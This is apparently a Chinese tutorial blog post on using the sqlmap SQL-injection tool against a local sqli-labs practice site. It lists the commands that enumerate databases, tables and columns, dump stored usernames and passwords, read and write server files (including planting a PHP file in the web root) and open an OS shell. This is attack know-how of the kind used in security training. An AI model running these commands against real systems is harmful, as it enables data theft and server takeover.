注入工具 -- sqlmap(枚举信息)

简介: 注入工具 -- sqlmap(枚举信息)


一、列举数据库名


sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --dbs

0a2653c851af460fa595bd959398a8f1.png


二、列举数据库表


qlmap -u “http://192.168.1.121/sqli/Less-1/?id=1”-D security --tables

0eacb84100b54626af849e6b562bf92a.png


三、列举数据库列名


sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” -D security -T users --columns

2d65d23f6d4748949b924e4057485923.png


四、列举数据值


sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” -D security -T users -C “password,username” --dump

2e9b90b2ca334476abebe75bafe6eeaa.png


五、列举schema信息,


–exclude-sysdbs 排除系统数据库

sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --schema --exclude-sysdb

4cebaac233b3433da32a72337a77fc60.png


六、检索表中数据的数量


sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --count --exclude-sysdbs

6de278e6d6694ce5bb08e7e842b7e74b.png


七、暴力破解数据


mysql<5.0时,没有information_schema,所以用–common-tables,–common-columns获取表名和列名,需要自己导入字典

sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” -D security --common-tables


八、读取文件,


sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --file-read=“C:\phpStudy\PHPTutorial\WWW\index.php”

7a399525ddec4b77923c464820b33738 (1).png


九、写入文件


–file-write 本地文件

–file-dest 远程写入文件

sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --file-write="/root/.sqlmap/output/192.168.1.121/files/123" --file-dest=“C:\phpStudy\PHPTutorial\WWW\321.php”


十、检索所有信息


sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” -a


十一、执行系统个命令


sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --os-shell

7a399525ddec4b77923c464820b33738.png


禁止非法,后果自负


目录
相关文章
|
JavaScript 前端开发
JS正则表达式:常用正则手册/RegExp/正则积累(一)
JS正则表达式:常用正则手册/RegExp/正则积累
377 1
|
JSON Java 数据格式
有关Java调用第三方接口【Content-type为form-data】的示例代码
有关Java调用第三方接口【Content-type为form-data】的示例代码
772 0
|
5月前
|
人工智能 开发者
文章和 PPT 配图有救了!SVG 绘图专家智能体大揭秘
本文分享如何使用 DeepSeek-V3-0324 和 Claude 3.5 或 3.7 绘制出高质量的图片,可以作为文章配图也可以为 PPT 配图,效率成倍增长。文章还介绍了原型图绘制、图片重绘修改和彩色报纸风的进阶案例。希望本文提供的技巧对大家有帮助,大家也可以修改提示词定制自己喜欢的风格。
353 13
|
存储 Linux 开发工具
告别Hugging Face模型下载难题:掌握高效下载策略,畅享无缝开发体验
【8月更文挑战第2天】告别Hugging Face模型下载难题:掌握高效下载策略,畅享无缝开发体验
2092 64
告别Hugging Face模型下载难题:掌握高效下载策略,畅享无缝开发体验
|
11月前
|
PHP 开发者
PHP中的异常处理:理解与实践
【10月更文挑战第21天】在编程的世界里,错误和异常是不可避免的。它们像是路上的绊脚石,让我们的步伐变得蹒跚。然而,如果我们能够正确地处理这些错误和异常,那么我们就可以将它们转化为成长的机会,让我们的代码变得更强大、更健壮。本文将深入探讨PHP中的异常处理机制,带你一起学习如何捕获和处理异常,以及如何使用自定义异常类来增强你的应用程序的错误处理能力。让我们一起踏上这段旅程,探索如何在PHP中优雅地处理异常吧!
2.任意输入三个数,求最大数
2.任意输入三个数,求最大数
73 0
|
算法 Android开发
安卓逆向 -- 自吐算法(MAC)
安卓逆向 -- 自吐算法(MAC)
107 1
|
安全 Cloud Native Java
Nacos身份绕过漏洞(QVD-2023-6271)复现学习
Nacos身份绕过漏洞(QVD-2023-6271)复现学习
8732 0
|
缓存 Dubbo 安全
合理使用线程池以及线程变量 下
合理使用线程池以及线程变量
495 0
合理使用线程池以及线程变量 下
|
定位技术
pyecharts第十节、地图(四、省份地图)
pyecharts第十节、地图(四、省份地图)
113 0
pyecharts第十节、地图(四、省份地图)

热门文章

最新文章